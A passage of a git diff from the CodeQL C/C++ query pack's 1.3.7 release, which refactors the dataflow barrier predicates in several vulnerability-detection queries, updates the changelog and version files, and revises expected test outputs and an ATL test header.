03369aacade3..f10c6457f795 100644 --- a/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/InvalidPointerToDereference.qll +++ b/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/InvalidPointerToDereference.qll @@ -203,9 +203,7 @@ private module InvalidPointerToDerefConfig implements DataFlow::StateConfigSig { predicate isSink(DataFlow::Node sink, FlowState pai) { none() } - predicate isBarrier(DataFlow::Node node) { - node = any(DataFlow::SsaPhiNode phi | not phi.isPhiRead()).getAnInput(true) - } + predicate isBarrier(DataFlow::Node node) { DataFlow::flowsToBackEdge(node) } predicate isBarrier(DataFlow::Node node, FlowState pai) { // `node = getABarrierNode(pai)` ensures that node < pai, so this node is safe to dereference. diff --git a/cpp/ql/src/CHANGELOG.md b/cpp/ql/src/CHANGELOG.md index 36df98d3941c..ab79d5cb46ef 100644 --- a/cpp/ql/src/CHANGELOG.md +++ b/cpp/ql/src/CHANGELOG.md @@ -1,3 +1,10 @@ +## 1.3.7 + +### Minor Analysis Improvements + +* Fixed a bug in the models for Microsoft's Active Template Library (ATL). +* The query "Use of basic integral type" (`cpp/jpl-c/basic-int-types`) no longer produces alerts for the standard fixed width integer types (`int8_t`, `uint8_t`, etc.), and the `_Bool` and `bool` types. + ## 1.3.6 No user-facing changes. diff --git a/cpp/ql/src/Diagnostics/ExtractionWarnings.ql b/cpp/ql/src/Diagnostics/ExtractionWarnings.ql index dcfb599bbeb4..f32768734ca0 100644 --- a/cpp/ql/src/Diagnostics/ExtractionWarnings.ql +++ b/cpp/ql/src/Diagnostics/ExtractionWarnings.ql @@ -14,5 +14,5 @@ where or warning instanceof ExtractionUnknownProblem select warning, - "Extraction failed in " + warning.getFile() + " with warning " + warning.getProblemMessage(), - warning.getSeverity() + "Extraction failed in " + warning.getFile() + " with warning " + + warning.getProblemMessage().replaceAll("$", "$$"), warning.getSeverity() diff --git a/cpp/ql/src/Diagnostics/Internal/ExtractionErrors.ql b/cpp/ql/src/Diagnostics/Internal/ExtractionErrors.ql index c7eac620b3b0..9da14fbfb468 100644 --- a/cpp/ql/src/Diagnostics/Internal/ExtractionErrors.ql +++ b/cpp/ql/src/Diagnostics/Internal/ExtractionErrors.ql @@ -17,5 +17,6 @@ from ExtractionError error where error instanceof ExtractionUnknownError or exists(error.getFile().getRelativePath()) -select error, "Extraction failed in " + error.getFile() + " with error " + error.getErrorMessage(), - error.getSeverity() +select error, + "Extraction failed in " + error.getFile() + " with error " + + error.getErrorMessage().replaceAll("$", "$$"), error.getSeverity() diff --git a/cpp/ql/src/JPL_C/LOC-3/Rule 17/BasicIntTypes.ql b/cpp/ql/src/JPL_C/LOC-3/Rule 17/BasicIntTypes.ql index 82b7f146554f..16ac18b87cce 100644 --- a/cpp/ql/src/JPL_C/LOC-3/Rule 17/BasicIntTypes.ql +++ b/cpp/ql/src/JPL_C/LOC-3/Rule 17/BasicIntTypes.ql @@ -12,7 +12,11 @@ import cpp predicate allowedTypedefs(TypedefType t) { - t.getName() = ["I64", "U64", "I32", "U32", "I16", "U16", "I8", "U8", "F64", "F32"] + t.getName() = + [ + "I64", "U64", "I32", "U32", "I16", "U16", "I8", "U8", "F64", "F32", "int64_t", "uint64_t", + "int32_t", "uint32_t", "int16_t", "uint16_t", "int8_t", "uint8_t" + ] } /** @@ -46,6 +50,8 @@ from Declaration d, Type usedType where usedType = getAUsedType*(getAnImmediateUsedType(d)) and problematic(usedType) and + // Allow uses of boolean types where defined by the language. + not usedType instanceof BoolType and // Ignore violations for which we do not have a valid location. not d.getLocation() instanceof UnknownLocation select d, diff --git a/cpp/ql/src/Likely Bugs/Memory Management/AllocaInLoop.ql b/cpp/ql/src/Likely Bugs/Memory Management/AllocaInLoop.ql index 587a2ecc6ffb..b4e517b3bab9 100644 --- a/cpp/ql/src/Likely Bugs/Memory Management/AllocaInLoop.ql +++ b/cpp/ql/src/Likely Bugs/Memory Management/AllocaInLoop.ql @@ -208,8 +208,7 @@ class LoopWithAlloca extends Stmt { this.conditionRequiresInequality(va, _, _) and DataFlow::localFlow(result, DataFlow::exprNode(va)) and // Phi nodes will be preceded by nodes that represent actual definitions - not result instanceof DataFlow::SsaPhiNode and - not result instanceof DataFlow::SsaPhiInputNode and + not result instanceof DataFlow::SsaSynthNode and // A source is outside the loop if it's not inside the loop not exists(Expr e | e = getExpr(result) | this = getAnEnclosingLoopOfExpr(e)) ) diff --git a/cpp/ql/src/Metrics/Internal/IncludeResolutionStatus.ql b/cpp/ql/src/Metrics/Internal/IncludeResolutionStatus.ql new file mode 100644 index 000000000000..e23b3cee8167 --- /dev/null +++ b/cpp/ql/src/Metrics/Internal/IncludeResolutionStatus.ql @@ -0,0 +1,20 @@ +/** + * @name Include file resolution status + * @description Counts unresolved and resolved #includes. + * This query is for internal use only and may change without notice. + * @kind table + * @id cpp/include-resolution-status + */ + +import cpp + +/** + * A cannot open file error. + * + * Typically this is due to a missing include. + */ +class CannotOpenFileError extends CompilerError { + CannotOpenFileError() { this.hasTag(["cannot_open_file", "cannot_open_file_reason"]) } +} + +select count(CannotOpenFileError e) as failed_includes, count(Include i) as successful_includes diff --git a/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql b/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql index 812fe236f764..9b27e95fd658 100644 --- a/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql +++ b/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql @@ -37,7 +37,7 @@ module Config implements DataFlow::ConfigSig { predicate isBarrier(DataFlow::Node node) { isSink(node) and node.asExpr().getUnspecifiedType() instanceof ArithmeticType or - node.asInstruction().(StoreInstruction).getResultType() instanceof ArithmeticType + node.asCertainDefinition().getUnspecifiedType() instanceof ArithmeticType } } diff --git a/cpp/ql/src/Security/CWE/CWE-114/UncontrolledProcessOperation.ql b/cpp/ql/src/Security/CWE/CWE-114/UncontrolledProcessOperation.ql index 9672a830ce06..e5fd1a94f181 100644 --- a/cpp/ql/src/Security/CWE/CWE-114/UncontrolledProcessOperation.ql +++ b/cpp/ql/src/Security/CWE/CWE-114/UncontrolledProcessOperation.ql @@ -37,7 +37,7 @@ module Config implements DataFlow::ConfigSig { predicate isBarrier(DataFlow::Node node) { isSink(node) and node.asExpr().getUnspecifiedType() instanceof ArithmeticType or - node.asInstruction().(StoreInstruction).getResultType() instanceof ArithmeticType + node.asCertainDefinition().getUnspecifiedType() instanceof ArithmeticType } } diff --git a/cpp/ql/src/Security/CWE/CWE-119/OverrunWriteProductFlow.ql b/cpp/ql/src/Security/CWE/CWE-119/OverrunWriteProductFlow.ql index 1872234ead20..b193b846b5a8 100644 --- a/cpp/ql/src/Security/CWE/CWE-119/OverrunWriteProductFlow.ql +++ b/cpp/ql/src/Security/CWE/CWE-119/OverrunWriteProductFlow.ql @@ -212,9 +212,7 @@ module StringSizeConfig implements ProductFlow::StateConfigSig { ) } - predicate isBarrierOut2(DataFlow::Node node) { - node = any(DataFlow::SsaPhiNode phi).getAnInput(true) - } + predicate isBarrierOut2(DataFlow::Node node) { DataFlow::flowsToBackEdge(node) } predicate isAdditionalFlowStep2( DataFlow::Node node1, FlowState2 state1, DataFlow::Node node2, FlowState2 state2 diff --git a/cpp/ql/src/Security/CWE/CWE-134/UncontrolledFormatString.ql b/cpp/ql/src/Security/CWE/CWE-134/UncontrolledFormatString.ql index f4a716765b8a..04b4fe45fcfa 100644 --- a/cpp/ql/src/Security/CWE/CWE-134/UncontrolledFormatString.ql +++ b/cpp/ql/src/Security/CWE/CWE-134/UncontrolledFormatString.ql @@ -42,7 +42,7 @@ module Config implements DataFlow::ConfigSig { predicate isBarrier(DataFlow::Node node) { isSink(node) and isArithmeticNonCharType(node.asExpr().getUnspecifiedType()) or - isArithmeticNonCharType(node.asInstruction().(StoreInstruction).getResultType()) + isArithmeticNonCharType(node.asCertainDefinition().getUnspecifiedType()) } } diff --git a/cpp/ql/src/Security/CWE/CWE-170/ImproperNullTerminationTainted.ql b/cpp/ql/src/Security/CWE/CWE-170/ImproperNullTerminationTainted.ql index e1e459c259f1..9b595657fce9 100644 --- a/cpp/ql/src/Security/CWE/CWE-170/ImproperNullTerminationTainted.ql +++ b/cpp/ql/src/Security/CWE/CWE-170/ImproperNullTerminationTainted.ql @@ -37,7 +37,7 @@ private module Config implements DataFlow::ConfigSig { predicate isBarrier(DataFlow::Node node) { isSink(node) and node.asExpr().getUnspecifiedType() instanceof ArithmeticType or - node.asInstruction().(StoreInstruction).getResultType() instanceof ArithmeticType + node.asCertainDefinition().getUnspecifiedType() instanceof ArithmeticType or mayAddNullTerminator(_, node.asIndirectExpr()) } diff --git a/cpp/ql/src/Security/CWE/CWE-190/ArithmeticTainted.ql b/cpp/ql/src/Security/CWE/CWE-190/ArithmeticTainted.ql index 810039f4e1a4..c9efaf9f6952 100644 --- a/cpp/ql/src/Security/CWE/CWE-190/ArithmeticTainted.ql +++ b/cpp/ql/src/Security/CWE/CWE-190/ArithmeticTainted.ql @@ -75,9 +75,11 @@ module Config implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { isSink(sink, _, _) } predicate isBarrier(DataFlow::Node node) { - exists(StoreInstruction store | store = node.asInstruction() | + exists(StoreInstruction store, Expr e | + store = node.asInstruction() and e = node.asCertainDefinition() + | // Block flow to "likely small expressions" - bounded(store.getSourceValue().getUnconvertedResultExpression()) + bounded(e) or // Block flow to "small types" store.getResultType().getUnspecifiedType().(IntegralType).getSize() <= 1 diff --git a/cpp/ql/src/change-notes/released/1.3.7.md b/cpp/ql/src/change-notes/released/1.3.7.md new file mode 100644 index 000000000000..6af01103f083 --- /dev/null +++ b/cpp/ql/src/change-notes/released/1.3.7.md @@ -0,0 +1,6 @@ +## 1.3.7 + +### Minor Analysis Improvements + +* Fixed a bug in the models for Microsoft's Active Template Library (ATL). +* The query "Use of basic integral type" (`cpp/jpl-c/basic-int-types`) no longer produces alerts for the standard fixed width integer types (`int8_t`, `uint8_t`, etc.), and the `_Bool` and `bool` types. diff --git a/cpp/ql/src/codeql-pack.release.yml b/cpp/ql/src/codeql-pack.release.yml index 0a0b09863112..2f4b67be43f7 100644 --- a/cpp/ql/src/codeql-pack.release.yml +++ b/cpp/ql/src/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.3.6 +lastReleaseVersion: 1.3.7 diff --git a/cpp/ql/src/codeql-suites/cpp-ccr.qls b/cpp/ql/src/codeql-suites/cpp-code-quality.qls similarity index 100% rename from cpp/ql/src/codeql-suites/cpp-ccr.qls rename to cpp/ql/src/codeql-suites/cpp-code-quality.qls diff --git a/cpp/ql/src/qlpack.yml b/cpp/ql/src/qlpack.yml index 76506195a1f0..be8212979faf 100644 --- a/cpp/ql/src/qlpack.yml +++ b/cpp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-queries -version: 1.3.6 +version: 1.3.7 groups: - cpp - queries diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected index eb0212153e8e..a9927b510930 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected @@ -44,6 +44,7 @@ edges | test.cpp:143:18:143:21 | asdf | test.cpp:134:25:134:27 | arr | provenance | | | test.cpp:143:18:143:21 | asdf | test.cpp:143:18:143:21 | asdf | provenance | | | test.cpp:146:26:146:26 | *p | test.cpp:147:4:147:9 | -- ... | provenance | | +| test.cpp:146:26:146:26 | *p | test.cpp:147:4:147:9 | -- ... | provenance | | | test.cpp:154:7:154:9 | definition of buf | test.cpp:156:12:156:18 | ... + ... | provenance | Config | | test.cpp:156:12:156:14 | buf | test.cpp:156:12:156:18 | ... + ... | provenance | Config | | test.cpp:156:12:156:18 | ... + ... | test.cpp:156:12:156:18 | ... + ... | provenance | | @@ -154,6 +155,7 @@ nodes | test.cpp:143:18:143:21 | asdf | semmle.label | asdf | | test.cpp:146:26:146:26 | *p | semmle.label | *p | | test.cpp:147:4:147:9 | -- ... | semmle.label | -- ... | +| test.cpp:147:4:147:9 | -- ... | semmle.label | -- ... | | test.cpp:154:7:154:9 | definition of buf | semmle.label | definition of buf | | test.cpp:156:12:156:14 | buf | semmle.label | buf | | test.cpp:156:12:156:18 | ... + ... | semmle.label | ... + ... | @@ -224,6 +226,8 @@ subpaths | test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:142:10:142:13 | definition of asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | | test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | | test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:154:7:154:9 | definition of buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:154:7:154:9 | definition of buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | | test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | | test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:217:19:217:24 | definition of buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | | test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/localFlow-ir.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/localFlow-ir.expected index c1dedd454b64..513c23e3c6eb 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/localFlow-ir.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/localFlow-ir.expected @@ -31,8 +31,6 @@ | example.c:17:21:17:21 | 0 | example.c:17:21:17:21 | 0 | | example.c:19:6:19:6 | *b | example.c:15:37:15:37 | *b | | example.c:19:6:19:6 | *b [post update] | example.c:15:37:15:37 | *b | -| example.c:19:6:19:6 | *b [post update] | example.c:19:6:19:6 | *b | -| example.c:19:6:19:6 | b [post update] | example.c:19:6:19:6 | b | | example.c:24:2:24:7 | *coords | example.c:26:18:26:24 | *& ... | | example.c:24:2:24:7 | *coords [post update] | example.c:26:18:26:24 | *& ... | | example.c:24:2:24:7 | coords | example.c:26:18:26:24 | & ... | @@ -53,11 +51,9 @@ | example.c:26:18:26:24 | *& ... | example.c:26:2:26:7 | *coords | | example.c:26:18:26:24 | getX output argument | example.c:26:2:26:7 | *coords | | example.c:26:18:26:24 | pointer to getX output argument | example.c:26:2:26:7 | coords | -| example.c:26:19:26:24 | *coords | example.c:26:18:26:24 | *& ... | | example.c:26:19:26:24 | coords | example.c:26:18:26:24 | & ... | | example.c:28:22:28:25 | & ... | example.c:28:14:28:25 | & ... | | example.c:28:22:28:25 | *& ... | example.c:28:14:28:25 | *& ... | -| example.c:28:23:28:25 | *pos | example.c:28:22:28:25 | *& ... | | example.c:28:23:28:25 | pos | example.c:28:22:28:25 | & ... | | test.cpp:6:12:6:17 | call to source | test.cpp:6:12:6:17 | call to source | | test.cpp:6:12:6:17 | call to source | test.cpp:7:8:7:9 | t1 | @@ -69,34 +65,26 @@ | test.cpp:8:8:8:9 | t1 | test.cpp:9:8:9:9 | t1 | | test.cpp:9:8:9:9 | t1 | test.cpp:11:7:11:8 | t1 | | test.cpp:9:8:9:9 | t1 | test.cpp:11:7:11:8 | t1 | -| test.cpp:10:8:10:9 | t2 | test.cpp:11:7:11:8 | Phi input | -| test.cpp:10:8:10:9 | t2 | test.cpp:11:7:11:8 | Phi input | +| test.cpp:10:8:10:9 | t2 | test.cpp:11:7:11:8 | [input] SSA phi read(t2) | +| test.cpp:10:8:10:9 | t2 | test.cpp:11:7:11:8 | [input] SSA phi(*t2) | | test.cpp:10:8:10:9 | t2 | test.cpp:13:10:13:11 | t2 | -| test.cpp:11:7:11:8 | Phi input | test.cpp:15:3:15:6 | SSA phi read(t2) | -| test.cpp:11:7:11:8 | Phi input | test.cpp:15:3:15:6 | SSA phi(*t2) | +| test.cpp:11:7:11:8 | [input] SSA phi read(t2) | test.cpp:15:8:15:9 | t2 | +| test.cpp:11:7:11:8 | [input] SSA phi(*t2) | test.cpp:15:8:15:9 | t2 | | test.cpp:11:7:11:8 | t1 | test.cpp:21:8:21:9 | t1 | | test.cpp:12:5:12:10 | ... = ... | test.cpp:13:10:13:11 | t2 | | test.cpp:12:10:12:10 | 0 | test.cpp:12:5:12:10 | ... = ... | -| test.cpp:13:5:13:8 | Phi input | test.cpp:15:3:15:6 | SSA phi read(t2) | -| test.cpp:13:5:13:8 | Phi input | test.cpp:15:3:15:6 | SSA phi(*t2) | -| test.cpp:13:10:13:11 | t2 | test.cpp:13:5:13:8 | Phi input | -| test.cpp:13:10:13:11 | t2 | test.cpp:13:5:13:8 | Phi input | -| test.cpp:15:3:15:6 | SSA phi read(t2) | test.cpp:15:8:15:9 | t2 | -| test.cpp:15:3:15:6 | SSA phi(*t2) | test.cpp:15:8:15:9 | t2 | -| test.cpp:15:8:15:9 | t2 | test.cpp:23:15:23:16 | Phi input | -| test.cpp:15:8:15:9 | t2 | test.cpp:23:15:23:16 | Phi input | +| test.cpp:13:10:13:11 | t2 | test.cpp:15:8:15:9 | t2 | +| test.cpp:13:10:13:11 | t2 | test.cpp:15:8:15:9 | t2 | +| test.cpp:15:8:15:9 | t2 | test.cpp:23:15:23:16 | [input] SSA phi read(*t2) | +| test.cpp:15:8:15:9 | t2 | test.cpp:23:15:23:16 | [input] SSA phi read(t2) | | test.cpp:17:3:17:8 | ... = ... | test.cpp:21:8:21:9 | t1 | | test.cpp:17:8:17:8 | 0 | test.cpp:17:3:17:8 | ... = ... | -| test.cpp:21:8:21:9 | t1 | test.cpp:23:15:23:16 | Phi input | -| test.cpp:21:8:21:9 | t1 | test.cpp:23:15:23:16 | Phi input | +| test.cpp:21:8:21:9 | t1 | test.cpp:23:19:23:19 | SSA phi read(t1) | +| test.cpp:21:8:21:9 | t1 | test.cpp:23:19:23:19 | SSA phi(*t1) | | test.cpp:23:15:23:16 | 0 | test.cpp:23:15:23:16 | 0 | -| test.cpp:23:15:23:16 | 0 | test.cpp:23:15:23:16 | Phi input | -| test.cpp:23:15:23:16 | Phi input | test.cpp:23:19:23:19 | SSA phi read(*t2) | -| test.cpp:23:15:23:16 | Phi input | test.cpp:23:19:23:19 | SSA phi read(i) | -| test.cpp:23:15:23:16 | Phi input | test.cpp:23:19:23:19 | SSA phi read(t1) | -| test.cpp:23:15:23:16 | Phi input | test.cpp:23:19:23:19 | SSA phi read(t2) | -| test.cpp:23:15:23:16 | Phi input | test.cpp:23:19:23:19 | SSA phi(*i) | -| test.cpp:23:15:23:16 | Phi input | test.cpp:23:19:23:19 | SSA phi(*t1) | +| test.cpp:23:15:23:16 | 0 | test.cpp:23:19:23:19 | SSA phi(*i) | +| test.cpp:23:15:23:16 | [input] SSA phi read(*t2) | test.cpp:23:19:23:19 | SSA phi read(*t2) | +| test.cpp:23:15:23:16 | [input] SSA phi read(t2) | test.cpp:23:19:23:19 | SSA phi read(t2) | | test.cpp:23:19:23:19 | SSA phi read(*t2) | test.cpp:24:10:24:11 | t2 | | test.cpp:23:19:23:19 | SSA phi read(i) | test.cpp:23:19:23:19 | i | | test.cpp:23:19:23:19 | SSA phi read(t1) | test.cpp:23:23:23:24 | t1 | @@ -105,25 +93,25 @@ | test.cpp:23:19:23:19 | SSA phi(*t1) | test.cpp:23:23:23:24 | t1 | | test.cpp:23:19:23:19 | i | test.cpp:23:27:23:27 | i | | test.cpp:23:19:23:19 | i | test.cpp:23:27:23:27 | i | -| test.cpp:23:23:23:24 | t1 | test.cpp:23:27:23:29 | Phi input | +| test.cpp:23:23:23:24 | t1 | test.cpp:23:27:23:29 | [input] SSA phi read(t1) | | test.cpp:23:23:23:24 | t1 | test.cpp:26:8:26:9 | t1 | | test.cpp:23:23:23:24 | t1 | test.cpp:26:8:26:9 | t1 | | test.cpp:23:27:23:27 | *i | test.cpp:23:27:23:27 | *i | | test.cpp:23:27:23:27 | *i | test.cpp:23:27:23:27 | i | | test.cpp:23:27:23:27 | i | test.cpp:23:27:23:27 | i | | test.cpp:23:27:23:27 | i | test.cpp:23:27:23:27 | i | -| test.cpp:23:27:23:27 | i | test.cpp:23:27:23:29 | Phi input | +| test.cpp:23:27:23:27 | i | test.cpp:23:27:23:29 | [input] SSA phi read(i) | | test.cpp:23:27:23:29 | ... ++ | test.cpp:23:27:23:29 | ... ++ | -| test.cpp:23:27:23:29 | ... ++ | test.cpp:23:27:23:29 | Phi input | -| test.cpp:23:27:23:29 | Phi input | test.cpp:23:19:23:19 | SSA phi read(*t2) | -| test.cpp:23:27:23:29 | Phi input | test.cpp:23:19:23:19 | SSA phi read(i) | -| test.cpp:23:27:23:29 | Phi input | test.cpp:23:19:23:19 | SSA phi read(t1) | -| test.cpp:23:27:23:29 | Phi input | test.cpp:23:19:23:19 | SSA phi read(t2) | -| test.cpp:23:27:23:29 | Phi input | test.cpp:23:19:23:19 | SSA phi(*i) | -| test.cpp:23:27:23:29 | Phi input | test.cpp:23:19:23:19 | SSA phi(*t1) | -| test.cpp:24:5:24:11 | ... = ... | test.cpp:23:27:23:29 | Phi input | -| test.cpp:24:10:24:11 | t2 | test.cpp:23:27:23:29 | Phi input | -| test.cpp:24:10:24:11 | t2 | test.cpp:23:27:23:29 | Phi input | +| test.cpp:23:27:23:29 | ... ++ | test.cpp:23:27:23:29 | [input] SSA phi(*i) | +| test.cpp:23:27:23:29 | [input] SSA phi read(*t2) | test.cpp:23:19:23:19 | SSA phi read(*t2) | +| test.cpp:23:27:23:29 | [input] SSA phi read(i) | test.cpp:23:19:23:19 | SSA phi read(i) | +| test.cpp:23:27:23:29 | [input] SSA phi read(t1) | test.cpp:23:19:23:19 | SSA phi read(t1) | +| test.cpp:23:27:23:29 | [input] SSA phi read(t2) | test.cpp:23:19:23:19 | SSA phi read(t2) | +| test.cpp:23:27:23:29 | [input] SSA phi(*i) | test.cpp:23:19:23:19 | SSA phi(*i) | +| test.cpp:23:27:23:29 | [input] SSA phi(*t1) | test.cpp:23:19:23:19 | SSA phi(*t1) | +| test.cpp:24:5:24:11 | ... = ... | test.cpp:23:27:23:29 | [input] SSA phi(*t1) | +| test.cpp:24:10:24:11 | t2 | test.cpp:23:27:23:29 | [input] SSA phi read(*t2) | +| test.cpp:24:10:24:11 | t2 | test.cpp:23:27:23:29 | [input] SSA phi read(t2) | | test.cpp:24:10:24:11 | t2 | test.cpp:24:5:24:11 | ... = ... | | test.cpp:382:48:382:54 | source1 | test.cpp:384:16:384:23 | *& ... | | test.cpp:383:12:383:13 | 0 | test.cpp:383:12:383:13 | 0 | @@ -134,7 +122,6 @@ | test.cpp:384:10:384:13 | *& ... | test.cpp:384:10:384:13 | *& ... | | test.cpp:384:10:384:13 | memcpy output argument | test.cpp:385:8:385:10 | tmp | | test.cpp:384:10:384:13 | pointer to memcpy output argument | test.cpp:385:8:385:10 | tmp | -| test.cpp:384:11:384:13 | *tmp | test.cpp:384:10:384:13 | *& ... | | test.cpp:384:11:384:13 | tmp | test.cpp:384:10:384:13 | & ... | | test.cpp:384:16:384:23 | & ... | test.cpp:384:16:384:23 | & ... | | test.cpp:384:16:384:23 | *& ... | test.cpp:384:3:384:8 | **call to memcpy | @@ -143,7 +130,6 @@ | test.cpp:384:16:384:23 | *& ... | test.cpp:384:16:384:23 | *& ... | | test.cpp:384:16:384:23 | **& ... | test.cpp:384:3:384:8 | **call to memcpy | | test.cpp:384:16:384:23 | **& ... | test.cpp:384:10:384:13 | memcpy output argument | -| test.cpp:384:17:384:23 | *source1 | test.cpp:384:16:384:23 | *& ... | | test.cpp:384:17:384:23 | source1 | test.cpp:384:16:384:23 | & ... | | test.cpp:388:53:388:59 | source1 | test.cpp:391:16:391:23 | *& ... | | test.cpp:388:66:388:66 | b | test.cpp:393:7:393:7 | b | @@ -153,7 +139,6 @@ | test.cpp:390:18:390:21 | & ... | test.cpp:391:10:391:13 | & ... | | test.cpp:390:18:390:21 | *& ... | test.cpp:390:18:390:21 | *& ... | | test.cpp:390:18:390:21 | *& ... | test.cpp:391:10:391:13 | *& ... | -| test.cpp:390:19:390:21 | *tmp | test.cpp:390:18:390:21 | *& ... | | test.cpp:390:19:390:21 | tmp | test.cpp:390:18:390:21 | & ... | | test.cpp:391:10:391:13 | & ... | test.cpp:391:3:391:8 | call to memcpy | | test.cpp:391:10:391:13 | & ... | test.cpp:391:10:391:13 | & ... | @@ -161,7 +146,6 @@ | test.cpp:391:10:391:13 | *& ... | test.cpp:391:10:391:13 | *& ... | | test.cpp:391:10:391:13 | memcpy output argument | test.cpp:392:8:392:10 | tmp | | test.cpp:391:10:391:13 | pointer to memcpy output argument | test.cpp:392:8:392:10 | tmp | -| test.cpp:391:11:391:13 | *tmp | test.cpp:391:10:391:13 | *& ... | | test.cpp:391:11:391:13 | tmp | test.cpp:391:10:391:13 | & ... | | test.cpp:391:16:391:23 | & ... | test.cpp:391:16:391:23 | & ... | | test.cpp:391:16:391:23 | *& ... | test.cpp:391:3:391:8 | **call to memcpy | @@ -170,7 +154,6 @@ | test.cpp:391:16:391:23 | *& ... | test.cpp:391:16:391:23 | *& ... | | test.cpp:391:16:391:23 | **& ... | test.cpp:391:3:391:8 | **call to memcpy | | test.cpp:391:16:391:23 | **& ... | test.cpp:391:10:391:13 | memcpy output argument | -| test.cpp:391:17:391:23 | *source1 | test.cpp:391:16:391:23 | *& ... | | test.cpp:391:17:391:23 | source1 | test.cpp:391:16:391:23 | & ... | | test.cpp:392:8:392:10 | tmp | test.cpp:394:10:394:12 | tmp | | test.cpp:392:8:392:10 | tmp | test.cpp:394:10:394:12 | tmp | @@ -196,8 +179,6 @@ | test.cpp:488:24:488:30 | content | test.cpp:488:21:488:30 | content | | test.cpp:489:20:489:20 | *s | test.cpp:487:67:487:67 | *s | | test.cpp:489:20:489:20 | *s [post update] | test.cpp:487:67:487:67 | *s | -| test.cpp:489:20:489:20 | *s [post update] | test.cpp:489:20:489:20 | *s | -| test.cpp:489:20:489:20 | s [post update] | test.cpp:489:20:489:20 | s | | test.cpp:489:23:489:29 | *content | test.cpp:489:23:489:29 | *content | | test.cpp:489:23:489:29 | *content | test.cpp:490:8:490:17 | * ... | | test.cpp:489:23:489:29 | content | test.cpp:489:23:489:29 | content | @@ -209,5 +190,4 @@ | test.cpp:1087:3:1087:3 | a [post update] | test.cpp:1088:8:1088:9 | & ... | | test.cpp:1087:15:1087:21 | 0 | test.cpp:1087:3:1087:21 | ... = ... | | test.cpp:1087:15:1087:21 | *0 | test.cpp:1087:3:1087:21 | *... = ... | -| test.cpp:1088:9:1088:9 | *a | test.cpp:1088:8:1088:9 | *& ... | | test.cpp:1088:9:1088:9 | a | test.cpp:1088:8:1088:9 | & ... | diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 7df5e3dc1a08..243401955172 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -13,377 +13,381 @@ typedef long long LONGLONG; typedef unsigned long* ULONG_PTR; typedef char *LPTSTR; typedef DWORD* LPDWORD; -typedef ULONG REGSAM; -typedef DWORD SECURITY_INFORMATION, *PSECURITY_INFORMATION; -typedef PVOID PSECURITY_DESCRIPTOR; -typedef struct _GUID { - unsigned long Data1; - unsigned short Data2; - unsigned short Data3; - unsigned char Data4[8]; -} GUID; -typedef GUID* REFGUID; - -typedef struct _SECURITY_ATTRIBUTES { - DWORD nLength; - LPVOID lpSecurityDescriptor; - BOOL bInheritHandle; -} SECURITY_ATTRIBUTES, *PSECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES; - -typedef struct _FILETIME { - DWORD dwLowDateTime; - DWORD dwHighDateTime; -} FILETIME, *PFILETIME, *LPFILETIME; using size_t = decltype(sizeof(int)); using SIZE_T = 